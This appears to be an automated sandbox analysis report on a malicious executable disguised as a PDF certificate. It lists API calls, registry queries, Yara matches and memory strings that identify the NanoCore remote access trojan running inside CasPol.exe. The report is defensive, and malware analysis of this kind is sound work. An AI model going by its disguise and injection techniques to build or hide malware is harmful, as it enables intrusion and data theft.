Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040336C

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Source: Yara match	File source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR

Remote Access Functionality

Source: CasPol.exe, 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: CasPol.exe, 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: CasPol.exe, 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Source: Yara match	File source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR